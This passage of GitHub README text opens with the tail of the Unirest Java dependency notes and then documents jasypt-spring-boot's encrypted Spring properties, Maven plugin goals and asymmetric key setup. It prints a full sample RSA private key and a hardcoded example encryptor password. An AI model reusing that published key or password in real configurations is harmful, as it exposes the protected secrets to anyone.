https://mvnrepository.com/artifact/com.konghq/unirest-java-core --> <dependency> <groupId>com.konghq</groupId> <artifactId>unirest-java-core</artifactId> </dependency> <!-- pick a JSON module if you want to parse JSON include one of these: --> <!-- Google GSON --> <dependency> <groupId>com.konghq</groupId> <artifactId>unirest-modules-gson</artifactId> </dependency> <!-- OR maybe you like Jackson better? --> <dependency> <groupId>com.konghq</groupId> <artifactId>unirest-modules-jackson</artifactId> </dependency> </dependencies> ``` #### 🚨 Attention JSON users 🚨 Under Unirest 4, core no longer comes with ANY transient dependencies, and because Java itself lacks a JSON parser you MUST declare a JSON implementation if you wish to do object mappings or use Json objects. ## Upgrading from Previous Versions See the [Upgrade Guide](UPGRADE_GUIDE.md) ## ChangeLog See the [Change Log](CHANGELOG.md) for recent changes. ## Documentation Our [Documentation](http://kong.github.io/unirest-java/) ## Unirest 3 ### Maven ```xml <!-- Pull in as a traditional dependency --> <dependency> <groupId>com.konghq</groupId> <artifactId>unirest-java</artifactId> <version>3.14.1</version> </dependency> ```
0
ulisesbocchio/jasypt-spring-boot
Jasypt integration for Spring boot
encryptable-properties encryption java java-8 java8 security spring spring-boot spring-boot-2 spring-boot-starter spring-boot2 web webapp website
# jasypt-spring-boot **[Jasypt](http://www.jasypt.org)** integration for Spring boot 2.x and 3.0.0 [![Build Status](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot.svg?branch=master)](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot) [![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ulisesbocchio/jasypt-spring-boot?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot) [![Code Climate](https://codeclimate.com/github/rsercano/mongoclient/badges/gpa.svg)](https://codeclimate.com/github/ulisesbocchio/jasypt-spring-boot) [![Codacy Badge](https://api.codacy.com/project/badge/Grade/6a75fc4e1d3f480f811b5339202400b5)](https://www.codacy.com/app/ulisesbocchio/jasypt-spring-boot?utm_source=github.com&amp;utm_medium=referral&amp;utm_content=ulisesbocchio/jasypt-spring-boot&amp;utm_campaign=Badge_Grade) [![GitHub release](https://img.shields.io/github/release/ulisesbocchio/jasypt-spring-boot.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot) [![Github All Releases](https://img.shields.io/github/downloads/ulisesbocchio/jasypt-spring-boot/total.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot) [![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://github.com/ulisesbocchio/jasypt-spring-boot/blob/master/LICENSE) [![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/ulisesbocchio/jasypt-spring-boot) [![Paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9J2V5HJT8AZF8) [!["Buy Me A Coffee"](https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png)](https://www.buymeacoffee.com/ulisesbd) Jasypt Spring Boot provides Encryption support for property sources in Spring Boot Applications.<br/> There are 3 ways to integrate `jasypt-spring-boot` in your project: - Simply adding the starter jar `jasypt-spring-boot-starter` to your classpath if using `@SpringBootApplication` or `@EnableAutoConfiguration` will enable encryptable properties across the entire Spring Environment - Adding `jasypt-spring-boot` to your classpath and adding `@EnableEncryptableProperties` to your main Configuration class to enable encryptable properties across the entire Spring Environment - Adding `jasypt-spring-boot` to your classpath and declaring individual encryptable property sources with `@EncrytablePropertySource` ## What's new? ### Go to [Releases](https://github.com/ulisesbocchio/jasypt-spring-boot/releases) ## What to do First? Use one of the following 3 methods (briefly explained above): 1. Simply add the starter jar dependency to your project if your Spring Boot application uses `@SpringBootApplication` or `@EnableAutoConfiguration` and encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, application-*.properties, yaml properties, and any other property sources can contain encrypted properties): ```xml <dependency> <groupId>com.github.ulisesbocchio</groupId> <artifactId>jasypt-spring-boot-starter</artifactId> <version>3.0.5</version> </dependency> ``` 2. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations then add this dependency to your project: ```xml <dependency> <groupId>com.github.ulisesbocchio</groupId> <artifactId>jasypt-spring-boot</artifactId> <version>3.0.5</version> </dependency> ``` And then add `@EnableEncryptableProperties` to you Configuration class. For instance: ```java @Configuration @EnableEncryptableProperties public class MyApplication { ... } ``` And encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, yaml properties, and any other custom property sources can contain encrypted properties) 3. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations and you don't want to enable encryptable properties across the entire Spring Environment, there's a third option. First add the following dependency to your project: ```xml <dependency> <groupId>com.github.ulisesbocchio</groupId> <artifactId>jasypt-spring-boot</artifactId> <version>3.0.5</version> </dependency> ``` And then add as many `@EncryptablePropertySource` annotations as you want in your Configuration files. Just like you do with Spring's `@PropertySource` annotation. For instance: ```java @Configuration @EncryptablePropertySource(name = "EncryptedProperties", value = "classpath:encrypted.properties") public class MyApplication { ... } ``` Conveniently, there's also a `@EncryptablePropertySources` annotation that one could use to group annotations of type `@EncryptablePropertySource` like this: ```java @Configuration @EncryptablePropertySources({@EncryptablePropertySource("classpath:encrypted.properties"), @EncryptablePropertySource("classpath:encrypted2.properties")}) public class MyApplication { ... } ``` Also, note that as of version 1.8, `@EncryptablePropertySource` supports YAML files ## Custom Environment As of version ~~1.7~~ 1.15, a 4th method of enabling encryptable properties exists for some special cases. A custom `ConfigurableEnvironment` class is provided: ~~`EncryptableEnvironment`~~ `StandardEncryptableEnvironment` and `StandardEncryptableServletEnvironment` that can be used with `SpringApplicationBuilder` to define the custom environment this way: ```java new SpringApplicationBuilder() .environment(new StandardEncryptableEnvironment()) .sources(YourApplicationClass.class).run(args); ``` This method would only require using a dependency for `jasypt-spring-boot`. No starter jar dependency is required. This method is useful for early access of encrypted properties on bootstrap. While not required in most scenarios could be useful when customizing Spring Boot's init behavior or integrating with certain capabilities that are configured very early, such as Logging configuration. For a concrete example, this method of enabling encryptable properties is the only one that works with Spring Properties replacement in `logback-spring.xml` files, using the `springProperty` tag. For instance: ```xml <springProperty name="user" source="db.user"/> <springProperty name="password" source="db.password"/> <appender name="db" class="ch.qos.logback.classic.db.DBAppender"> <connectionSource class="ch.qos.logback.core.db.DriverManagerConnectionSource"> <driverClass>org.postgresql.Driver</driverClass> <url>jdbc:postgresql://localhost:5432/simple</url> <user>${user}</user> <password>${password}</password> </connectionSource> </appender> ``` This mechanism could be used for instance (as shown) to initialize Database Logging Appender that require sensitive credentials to be passed. Alternatively, if a custom `StringEncryptor` is needed to be provided, a static builder method is provided `StandardEncryptableEnvironment#builder` for customization (other customizations are possible): ```java StandardEncryptableEnvironment .builder() .encryptor(new MyEncryptor()) .build() ``` ## How everything Works? This will trigger some configuration to be loaded that basically does 2 things: 1. It registers a Spring post processor that decorates all PropertySource objects contained in the Spring Environment so they are "encryption aware" and detect when properties are encrypted following jasypt's property convention. 2. It defines a default `StringEncryptor` that can be configured through regular properties, system properties, or command line arguments. ## Where do I put my encrypted properties? When using METHODS 1 and 2 you can define encrypted properties in any of the PropertySource contained in the Environment. For instance, using the @PropertySource annotation: ```java @SpringBootApplication @EnableEncryptableProperties @PropertySource(name="EncryptedProperties", value = "classpath:encrypted.properties") public class MyApplication { ... } ``` And your encrypted.properties file would look something like this: ```properties secret.property=ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+) ``` Now when you do `environment.getProperty("secret.property")` or use `@Value("${secret.property}")` what you get is the decrypted version of `secret.property`.<br/> When using METHOD 3 (`@EncryptablePropertySource`) then you can access the encrypted properties the same way, the only difference is that you must put the properties in the resource that was declared within the `@EncryptablePropertySource` annotation so that the properties can be decrypted properly. ## Password-based Encryption Configuration Jasypt uses an `StringEncryptor` to decrypt properties. For all 3 methods, if no custom `StringEncryptor` (see the [Custom Encryptor](#customEncryptor) section for details) is found in the Spring Context, one is created automatically that can be configured through the following properties (System, properties file, command line arguments, environment variable, etc.): <table border="1"> <tr> <td>Key</td><td>Required</td><td>Default Value</td> </tr> <tr> <td>jasypt.encryptor.password</td><td><b>True</b></td><td> - </td> </tr> <tr> <td>jasypt.encryptor.algorithm</td><td>False</td><td>PBEWITHHMACSHA512ANDAES_256</td> </tr> <tr> <td>jasypt.encryptor.key-obtention-iterations</td><td>False</td><td>1000</td> </tr> <tr> <td>jasypt.encryptor.pool-size</td><td>False</td><td>1</td> </tr> <tr> <td>jasypt.encryptor.provider-name</td><td>False</td><td>SunJCE</td> </tr> <tr> <td>jasypt.encryptor.provider-class-name</td><td>False</td><td>null</td> </tr> <tr> <td>jasypt.encryptor.salt-generator-classname</td><td>False</td><td>org.jasypt.salt.RandomSaltGenerator</td> </tr> <tr> <td>jasypt.encryptor.iv-generator-classname</td><td>False</td><td>org.jasypt.iv.RandomIvGenerator</td> </tr> <tr> <td>jasypt.encryptor.string-output-type</td><td>False</td><td>base64</td> </tr> <tr> <td>jasypt.encryptor.proxy-property-sources</td><td>False</td><td>false</td> </tr> <tr> <td>jasypt.encryptor.skip-property-sources</td><td>False</td><td>empty list</td> </tr> </table> The only property required is the encryption password, the rest could be left to use default values. While all this properties could be declared in a properties file, the encryptor password should not be stored in a property file, it should rather be passed as system property, command line argument, or environment variable and as far as its name is `jasypt.encryptor.password` it'll work.<br/> The last property, `jasypt.encryptor.proxyPropertySources` is used to indicate `jasyp-spring-boot` how property values are going to be intercepted for decryption. The default value, `false` uses custom wrapper implementations of `PropertySource`, `EnumerablePropertySource`, and `MapPropertySource`. When `true` is specified for this property, the interception mechanism will use CGLib proxies on each specific `PropertySource` implementation. This may be useful on some scenarios where the type of the original `PropertySource` must be preserved. ## <a name="customEncryptor"></a>Use you own Custom Encryptor For custom configuration of the encryptor and the source of the encryptor password you can always define your own StringEncryptor bean in your Spring Context, and the default encryptor will be ignored. For instance: ```java @Bean("jasyptStringEncryptor") public StringEncryptor stringEncryptor() { PooledPBEStringEncryptor encryptor = new PooledPBEStringEncryptor(); SimpleStringPBEConfig config = new SimpleStringPBEConfig(); config.setPassword("password"); config.setAlgorithm("PBEWITHHMACSHA512ANDAES_256"); config.setKeyObtentionIterations("1000"); config.setPoolSize("1"); config.setProviderName("SunJCE"); config.setSaltGeneratorClassName("org.jasypt.salt.RandomSaltGenerator"); config.setIvGeneratorClassName("org.jasypt.iv.RandomIvGenerator"); config.setStringOutputType("base64"); encryptor.setConfig(config); return encryptor; } ``` Notice that the bean name is required, as `jasypt-spring-boot` detects custom String Encyptors by name as of version `1.5`. The default bean name is: ``` jasyptStringEncryptor ``` But one can also override this by defining property: ``` jasypt.encryptor.bean ``` So for instance, if you define `jasypt.encryptor.bean=encryptorBean` then you would define your custom encryptor with that name: ```java @Bean("encryptorBean") public StringEncryptor stringEncryptor() { ... } ``` ## Custom Property Detector, Prefix, Suffix and/or Resolver As of `jasypt-spring-boot-1.10` there are new extensions points. `EncryptablePropertySource` now uses `EncryptablePropertyResolver` to resolve all properties: ```java public interface EncryptablePropertyResolver { String resolvePropertyValue(String value); } ``` Implementations of this interface are responsible of both **detecting** and **decrypting** properties. The default implementation, `DefaultPropertyResolver` uses the before mentioned `StringEncryptor` and a new `EncryptablePropertyDetector`. ### Provide a Custom `EncryptablePropertyDetector` You can override the default implementation by providing a Bean of type `EncryptablePropertyDetector` with name `encryptablePropertyDetector` or if you wanna provide your own bean name, override property `jasypt.encryptor.property.detector-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for detecting encrypted properties. Example: ```java private static class MyEncryptablePropertyDetector implements EncryptablePropertyDetector { @Override public boolean isEncrypted(String value) { if (value != null) { return value.startsWith("ENC@"); } return false; } @Override public String unwrapEncryptedValue(String value) { return value.substring("ENC@".length()); } } ``` ```java @Bean(name = "encryptablePropertyDetector") public EncryptablePropertyDetector encryptablePropertyDetector() { return new MyEncryptablePropertyDetector(); } ``` ### Provide a Custom Encrypted Property `prefix` and `suffix` If all you want to do is to have different prefix/suffix for encrypted properties, you can keep using all the default implementations and just override the following properties in `application.properties` (or `application.yml`): ```YAML jasypt: encryptor: property: prefix: "ENC@[" suffix: "]" ``` ### Provide a Custom `EncryptablePropertyResolver` You can override the default implementation by providing a Bean of type `EncryptablePropertyResolver` with name `encryptablePropertyResolver` or if you wanna provide your own bean name, override property `jasypt.encryptor.property.resolver-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for detecting and decrypting encrypted properties. Example: ```java class MyEncryptablePropertyResolver implements EncryptablePropertyResolver { private final PooledPBEStringEncryptor encryptor; public MyEncryptablePropertyResolver(char[] password) { this.encryptor = new PooledPBEStringEncryptor(); SimpleStringPBEConfig config = new SimpleStringPBEConfig(); config.setPasswordCharArray(password); config.setAlgorithm("PBEWITHHMACSHA512ANDAES_256"); config.setKeyObtentionIterations("1000"); config.setPoolSize(1); config.setProviderName("SunJCE"); config.setSaltGeneratorClassName("org.jasypt.salt.RandomSaltGenerator"); config.setIvGeneratorClassName("org.jasypt.iv.RandomIvGenerator"); config.setStringOutputType("base64"); encryptor.setConfig(config); } @Override public String resolvePropertyValue(String value) { if (value != null && value.startsWith("{cipher}")) { return encryptor.decrypt(value.substring("{cipher}".length())); } return value; } } ``` ```java @Bean(name="encryptablePropertyResolver") EncryptablePropertyResolver encryptablePropertyResolver(@Value("${jasypt.encryptor.password}") String password) { return new MyEncryptablePropertyResolver(password.toCharArray()); } ``` Notice that by overriding `EncryptablePropertyResolver`, any other configuration or overrides you may have for prefixes, suffixes, `EncryptablePropertyDetector` and `StringEncryptor` will stop working since the Default resolver is what uses them. You'd have to wire all that stuff yourself. Fortunately, you don't have to override this bean in most cases, the previous options should suffice. But as you can see in the implementation, the detection and decryption of the encrypted properties are internal to `MyEncryptablePropertyResolver` ## Using Filters `jasypt-spring-boot:2.1.0` introduces a new feature to specify property filters. The filter is part of the `EncryptablePropertyResolver` API and allows you to determine which properties or property sources to contemplate for decryption. This is, before even examining the actual property value to search for, or try to, decrypt it. For instance, by default, all properties which name start with `jasypt.encryptor` are excluded from examination. This is to avoid circular dependencies at load time when the library beans are configured. ### DefaultPropertyFilter properties By default, the `DefaultPropertyResolver` uses `DefaultPropertyFilter`, which allows you to specify the following string pattern lists: * jasypt.encryptor.property.filter.include-sources: Specify the property sources name patterns to be included for decryption * jasypt.encryptor.property.filter.exclude-sources: Specify the property sources name patterns to be EXCLUDED for decryption * jasypt.encryptor.property.filter.include-names: Specify the property name patterns to be included for decryption * jasypt.encryptor.property.filter.exclude-names: Specify the property name patterns to be EXCLUDED for decryption ### Provide a custom `EncryptablePropertyFilter` You can override the default implementation by providing a Bean of type `EncryptablePropertyFilter` with name `encryptablePropertyFilter` or if you wanna provide your own bean name, override property `jasypt.encryptor.property.filter-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for detecting properties and/or property sources you want to contemplate for decryption. Example: ```java class MyEncryptablePropertyFilter implements EncryptablePropertyFilter { public boolean shouldInclude(PropertySource<?> source, String name) { return name.startsWith('encrypted.'); } } ``` ```java @Bean(name="encryptablePropertyFilter") EncryptablePropertyFilter encryptablePropertyFilter() { return new MyEncryptablePropertyFilter(); } ``` Notice that for this mechanism to work, you should not provide a custom `EncryptablePropertyResolver` and use the default resolver instead. If you provide custom resolver, you are responsible for the entire process of detecting and decrypting properties. ## Filter out `PropertySource` classes from being introspected Define a comma-separated list of fully-qualified class names to be skipped from introspection. This classes will not be wrapped/proxied by this plugin and thereby properties contained in them won't supported encryption/decryption: ```properties jasypt.encryptor.skip-property-sources=org.springframework.boot.env.RandomValuePropertySource,org.springframework.boot.ansi.AnsiPropertySource ``` ## Encryptable Properties cache refresh Encrypted properties are cached within your application and in certain scenarios, like when using externalized configuration from a config server the properties need to be refreshed when they changed. For this `jasypt-spring-boot` registers a `RefreshScopeRefreshedEventListener` that listens to the following events by default to clear the encrypted properties cache: ```java public static final List<String> EVENT_CLASS_NAMES = Arrays.asList( "org.springframework.cloud.context.scope.refresh.RefreshScopeRefreshedEvent", "org.springframework.cloud.context.environment.EnvironmentChangeEvent", "org.springframework.boot.web.servlet.context.ServletWebServerInitializedEvent" ); ``` Should you need to register extra events that you would like to trigger an encrypted cache invalidation you can add them using the following property (separate by comma if more than one needed): ```properties jasypt.encryptor.refreshed-event-classes=org.springframework.boot.context.event.ApplicationStartedEvent ``` ## Maven Plugin A Maven plugin is provided with a number of helpful utilities. To use the plugin, just add the following to your pom.xml: ```xml <build> <plugins> <plugin> <groupId>com.github.ulisesbocchio</groupId> <artifactId>jasypt-maven-plugin</artifactId> <version>3.0.5</version> </plugin> </plugins> </build> ``` When using this plugin, the easiest way to provide your encryption password is via a system property i.e. -Djasypt.encryptor.password="the password". By default, the plugin will consider encryption configuration in standard Spring boot configuration files under ./src/main/resources. You can also use system properties or environment variables to supply this configuration. Keep in mind that the rest of your application code and resources are not available to the plugin because Maven plugins do not share a classpath with projects. If your application provides encryption configuration via a StringEncryptor bean then this will not be picked up. In general, it is recommended to just rely on the secure default configuration. ### Encryption To encrypt a single value run: ```bash mvn jasypt:encrypt-value -Djasypt.encryptor.password="the password" -Djasypt.plugin.value="theValueYouWantToEncrypt" ``` To encrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `DEC(...)`. For example: ```properties sensitive.password=DEC(secret value) regular.property=example ``` Then run: ```bash mvn jasypt:encrypt -Djasypt.encryptor.password="the password" ``` Which would edit that file in place resulting in: ```properties sensitive.password=ENC(encrypted) regular.property=example ``` The file name and location can be customised. ### Decryption To decrypt a single value run: ```bash mvn jasypt:decrypt-value -Djasypt.encryptor.password="the password" -Djasypt.plugin.value="DbG1GppXOsFa2G69PnmADvQFI3esceEhJYbaEIKCcEO5C85JEqGAhfcjFMGnoRFf" ``` To decrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `ENC(...)`. For example: ```properties sensitive.password=ENC(encrypted) regular.property=example ``` This can be decrypted as follows: ```bash mvn jasypt:decrypt -Djasypt.encryptor.password="the password" ``` Which would output the decrypted contents to the screen: ```properties sensitive.password=DEC(decrypted) regular.property=example ``` Note that outputting to the screen, rather than editing the file in place, is designed to reduce accidental committing of decrypted values to version control. When decrypting, you most likely just want to check what value has been encrypted, rather than wanting to permanently decrypt that value. ### Re-encryption Changing the configuration for existing encrypted properties is slightly awkward using the encrypt/decrypt goals. You must run the decrypt goal using the old configuration, then copy the decrypted output back into the original file, then run the encrypt goal with the new configuration. The re-encrypt goal simplifies this by re-encrypting a file in place. 2 sets of configuration must be provided. The new configuration is supplied in the same way as you would configure the other maven goals. The old configuration is supplied via system properties prefixed with "jasypt.plugin.old" instead of "jasypt.encryptor". For example, to re-encrypt application.properties that was previously encrypted with the password OLD and then encrypt with the new password NEW: ```bash mvn jasypt:reencrypt -Djasypt.plugin.old.password=OLD -Djasypt.encryptor.password=NEW ``` *Note: All old configuration must be passed as system properties. Environment variables and Spring Boot configuration files are not supported.* ### Upgrade Sometimes the default encryption configuration might change between versions of jasypt-spring-boot. You can automatically upgrade your encrypted properties to the new defaults with the upgrade goal. This will decrypt your application.properties file using the old default configuration and re-encrypt using the new default configuration. ```bash mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE ``` You can also pass the system property `-Djasypt.plugin.old.major-version` to specify the version you are upgrading from. This will always default to the last major version where the configuration changed. Currently, the only major version where the defaults changed is version 2, so there is no need to set this property, but it is there for future use. ### Load You can also decrypt a properties file and load all of its properties into memory and make them accessible to Maven. This is useful when you want to make encrypted properties available to other Maven plugins. You can chain the goals of the later plugins directly after this one. For example, with flyway: ```bash mvn jasypt:load flyway:migrate -Djasypt.encryptor.password="the password" ``` You can also specify a prefix for each property with `-Djasypt.plugin.keyPrefix=example.`. This helps to avoid potential clashes with other Maven properties. ### Changing the file path For all the above utilities, the path of the file you are encrypting/decrypting defaults to `file:src/main/resources/application.properties`. This can be changed using the `-Djasypt.plugin.path` system property. You can encrypt a file in your test resources directory: ```bash mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/test/application.properties" -Djasypt.encryptor.password="the password" ``` Or with a different name: ```bash mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/resources/flyway.properties" -Djasypt.encryptor.password="the password" ``` Or with a different file type (the plugin supports any plain text file format including YAML): ```bash mvn jasypt:encrypt -Djasypt.plugin.path="file:src/main/resources/application.yaml" -Djasypt.encryptor.password="the password" ``` **Note that the load goal only supports .property files** ### Spring profiles and other spring config You can override any spring config you support in your application when running the plugin, for instance selecting a given spring profile: ```bash mvn jasypt:encrypt -Dspring.profiles.active=cloud -Djasypt.encryptor.password="the password" ``` ### Multi-module maven projects To encrypt/decrypt properties in multi-module projects disable recursion with `-N` or `--non-recursive` on the maven command: ```bash mvn jasypt:upgrade -Djasypt.plugin.path=file:server/src/test/resources/application-test.properties -Djasypt.encryptor.password=supersecret -N ``` ## Asymmetric Encryption `jasypt-spring-boot:2.1.1` introduces a new feature to encrypt/decrypt properties using asymmetric encryption with a pair of private/public keys in DER or PEM formats. ### Config Properties The following are the configuration properties you can use to config asymmetric decryption of properties; <table border="1"> <tr> <td>Key</td><td>Default Value</td><td>Description</td> </tr> <tr> <td>jasypt.encryptor.privateKeyString</td><td>null</td><td> private key for decryption in String format</td> </tr> <tr> <td>jasypt.encryptor.privateKeyLocation</td><td>null</td><td>location of the private key for decryption in spring resource format</td> </tr> <tr> <td>jasypt.encryptor.privateKeyFormat</td><td>DER</td><td>Key format. DER or PEM</td> </tr> </table> You should either use `privateKeyString` or `privateKeyLocation`, the String format takes precedence if set. To specify a private key in DER format with `privateKeyString`, please encode the key bytes to `base64`. __Note__ that `jasypt.encryptor.password` still takes precedences for PBE encryption over the asymmetric config. ### Sample config #### DER key as string ```yaml jasypt: encryptor: privateKeyString: MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYMZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+LIQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1iG9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpAuAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMUvcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQaNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLIDYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKBV/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPazXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXuPmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPkbPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJDiy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRffumowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kIohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIBt3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSard+dewfKoPnWw0WyGFEWCg== ``` #### DER key as a resource location ```yaml jasypt: encryptor: privateKeyLocation: classpath:private_key.der ``` #### PEM key as string ```yaml jasypt: encryptor: privateKeyFormat: PEM privateKeyString: |- -----BEGIN PRIVATE KEY----- MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYM ZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+L IQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39 orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1i G9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpA uAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr 2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMU vcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54 kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQ aNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLI DYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKB V/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPa zXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXu PmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPk bPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO 5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJ Diy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRff umowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kI ohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3 UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584 JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/ jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIB t3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1 Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0 lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSa rd+dewfKoPnWw0WyGFEWCg== -----END PRIVATE KEY----- ``` #### PEM key as a resource location ```yaml jasypt: encryptor: privateKeyFormat: PEM privateKeyLocation: classpath:private_key.pem ``` ### Encrypting properties There is no program/command to encrypt properties using asymmetric keys but you can use the following code snippet to encrypt your properties: #### DER Format ```java import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricConfig; import com.ulisesbocchio.jasyptspringboot.encryptor.SimpleAsymmetricStringEncryptor; import org.jasypt.encryption.StringEncryptor; public class PropertyEncryptor { public static void main(String[] args) { SimpleAsymmetricConfig config = new SimpleAsymmetricConfig(); config.setPublicKey("MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEArQfyGCvBOdgmDGU6ciGPVNB6jHsMip0b0qOrPvVTSJ/x0offjKARogA2tjGjyr3rUtwg9woMBqv/iyENR0GBnIUa0jkYsznCKeygcflnNa4mrVf7XKXLhSwtY+kCe3diPk+0QPfEsfF9/aK6pWBUFcrE8P2k2sF/8mo8dFJU1t6zQGPspHkNAgR6MLU8SjPZxnMS6EG722MdYhvSYAKsnu02Hozqb4jh/gaQ/E6NkvM3DkqIyIYsRH2smstIFEb9CCiTdiz/OsJKQLgGy/pqIVKtai3lnUxAayEV45Z61rNTOusNJf+icGhZxjqhAeoWjMxOCVmVC2GKa9sisqBgkQIDAQAB"); StringEncryptor encryptor = new 